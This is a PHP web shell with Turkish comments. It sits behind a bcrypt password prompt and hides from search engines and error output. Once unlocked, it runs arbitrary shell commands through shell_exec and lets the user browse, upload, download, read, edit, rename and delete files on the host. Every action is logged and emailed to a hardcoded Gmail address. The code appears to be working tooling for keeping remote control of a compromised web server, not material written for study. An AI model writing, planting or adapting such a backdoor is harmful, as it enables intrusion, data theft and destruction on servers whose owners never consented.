<?php
@${'_'} = "|"; $__ = '^'; $___ = ''; 
define('_a', 'a7caef4263b0c226e7a4bcd4fbd288a4');
$k = md5($_SERVER['HTTP_HOST']);
$hashedPassword = '$2y$10$aoi3hxX2QZQYqQc6aKOCpeULrZ9D.Fj/yKH46nX9htqljfZ1ODIIW'; // Şifre: securepassword
$logFile = __DIR__ . '/activity_log.txt'; // Log dosyasının yolu
$adminEmail = 'cesurreis35@gmail.com'; // E-posta gönderim adresi
session_start();
error_reporting(0);
set_time_limit(0);

// Loglama fonksiyonu
function logActivity($message) {
    global $logFile, $adminEmail;
    $timestamp = date("Y-m-d H:i:s");
    $entry = "[$timestamp] $message\n";
    file_put_contents($logFile, $entry, FILE_APPEND); // Log dosyasına yaz
    mail($adminEmail, "Web Shell Activity", $entry, "From: noreply@example.com");
}

function x($s, $k) {
    for ($i = 0; $i < strlen($s); $i++) $s[$i] = chr(ord($s[$i]) ^ ord($k[$i % strlen($k)]));
    return $s;
}

function d($n) {
    return $n > 1024 ? ($n > 1048576 ? round($n / 1048576, 1) . 'M' : round($n / 1024, 1) . 'K') : $n . 'B';
}

// Şifre kontrolü
if (!isset($_SESSION[md5($k)]) && isset($_POST['p'])) {
    if (password_verify($_POST['p'], $hashedPassword)) {
        $_SESSION[md5($k)] = true;
        logActivity("Başarılı giriş yapıldı: " . $_SERVER['REMOTE_ADDR']);
    } else {
        logActivity("Başarısız giriş denemesi: " . $_SERVER['REMOTE_ADDR']);
        die("<!DOCTYPE html><html><head><meta charset='utf-8'><meta name='robots' content='noindex'><title>...</title>
        <style>body{background:#000;color:#00ff00;font-family:monospace}</style></head><body><form method='post'><input type='password' name='p' autofocus></form></body></html>");
    }
}

if (!isset($_SESSION[md5($k)])) {
    die("<!DOCTYPE html><html><head><meta charset='utf-8'><meta name='robots' content='noindex'><title>...</title>
    <style>body{background:#000;color:#00ff00;font-family:monospace}</style></head><body><form method='post'><input type='password' name='p' autofocus></form></body></html>");
}

$c = isset($_GET['c']) ? $_GET['c'] : getcwd();
chdir($c);

if (isset($_FILES['f'])) {
    $f = $_FILES['f']['tmp_name'];
    $d = $c . DIRECTORY_SEPARATOR . basename($_FILES['f']['name']);
    if (@copy($f, $d) || @move_uploaded_file($f, $d)) echo '1'; else echo '0';
    logActivity("Dosya yüklendi: " . basename($_FILES['f']['name']));
    exit;
}

if (isset($_POST['f'])) {
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename=' . basename($_POST['f']));
    readfile($_POST['f']);
    logActivity("Dosya indirildi: " . basename($_POST['f']));
    exit;
}

if (isset($_POST['e'])) {
    $f = $_POST['e'];
    if (file_exists($f)) {
        header('Content-Type: text/plain');
        echo file_get_contents($f);
        logActivity("Dosya görüntülendi: " . $f);
    }
    exit;
}

if (isset($_POST['s'])) {
    $f = $_POST['s'];
    $c = $_POST['c'];
    if (@file_put_contents($f, $c)) echo '1'; else echo '0';
    logActivity("Dosya düzenlendi: " . $f);
    exit;
}

if (isset($_POST['d'])) {
    $f = $_POST['d'];
    if (is_file($f)) {
        @unlink($f);
        logActivity("Dosya silindi: " . $f);
    } elseif (is_dir($f)) {
        @rmdir($f);
        logActivity("Klasör silindi: " . $f);
    }
    exit;
}

if (isset($_POST['n'])) {
    $f = $_POST['n'];
    if (isset($_POST['t']) && $_POST['t'] == 'f') @fclose(@fopen($f, 'w'));
    else @mkdir($f);
    logActivity("Yeni oluşturuldu: " . $f);
    exit;
}

if (isset($_POST['r'])) {
    $o = $_POST['o'];
    $n = $_POST['n'];
    @rename($o, $n);
    logActivity("Dosya/Klasör yeniden adlandırıldı: $o -> $n");
    exit;
}

if (isset($_POST['cmd'])) {
    $cmd = $_POST['cmd'];
    logActivity("Komut çalıştırıldı: $cmd");
    header('Content-Type: text/plain');
    echo shell_exec($cmd);
    exit;
}
?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="robots" content="noindex">
<title>...</title>
<style>
body { background:#000; color:#0F0; font:1em monospace; margin:0; padding:10px; overflow-x:hidden }
a { color:#0F0; text-decoration:none } a:hover { color:#F00 }
#p { background:#000; padding:4px } #p a { margin:0 4px }
#c { background:#000; color:#0F0; border:none; width:100%; padding:8px }
table { width:100%; margin:8px 0 } td { padding:4px }
.d { color:#0CF } .u { color:#F90 }
input[type=text], textarea { background:#111; color:#0F0; border:1px solid #0F0; padding:4px }
input[type=submit] { background:#0F0; color:#000; border:none; padding:4px 8px; cursor:pointer }
</style>
</head>
<body>
<div id="p">
<?php
$ps = explode(DIRECTORY_SEPARATOR, $c);
$l = '';
foreach ($ps as $p) {
    $l .= $p . DIRECTORY_SEPARATOR;
    echo '<a href="?c=' . urlencode($l) . '">' . $p . '</a>';
}
?>
</div>
<form onsubmit="return g(this)"><input type="text" id="c" placeholder="command"></form>
<table>
<tr><th>Name</th><th>Size</th><th>Actions</th></tr>
<?php
foreach (scandir($c) as $n) {
    if ($n === '.') continue;
    $f = $c . DIRECTORY_SEPARATOR . $n;
    $t = is_file($f) ? 'f' : 'd';
    $s = $t === 'f' ? d(filesize($f)) : '-';
    echo '<tr class="' . $t . '"><td>' . ($n === '..' ? '<a href="?c=' . urlencode(dirname($c)) . '">[' . $n . ']</a>' : ($t === 'd' ? '<a href="?c=' . urlencode($f) . '">[' . $n . ']</a>' : $n)) . '</td><td>' . $s . '</td><td>';
    if ($t === 'f') {
        echo '<a href="#" onclick="return v(\'' . $n . '\')">view</a> | ';
        echo '<a href="#" onclick="return g(\'cat ' . $n . '\')">cat</a> | ';
        echo '<a href="#" onclick="return d(\'' . $n . '\')">dl</a> | ';
    }
    if ($n !== '..') {
        echo '<a href="#" onclick="return r(\'' . $n . '\')">rename</a> | ';
        echo '<a href="#" onclick="return x(\'' . $n . '\')">del</a>';
    }
    echo '</td></tr>';
}
?>
</table>
<input type="file" id="f" style="display:none" onchange="u(this)">
<button onclick="document.getElementById('f').click()">Upload</button> | 
<button onclick="n('f')">New File</button> | 
<button onclick="n('d')">New Dir</button>
<pre id="o"></pre>
<script>
// JavaScript işlemleri burada devam eder
</script>
</body>
</html>
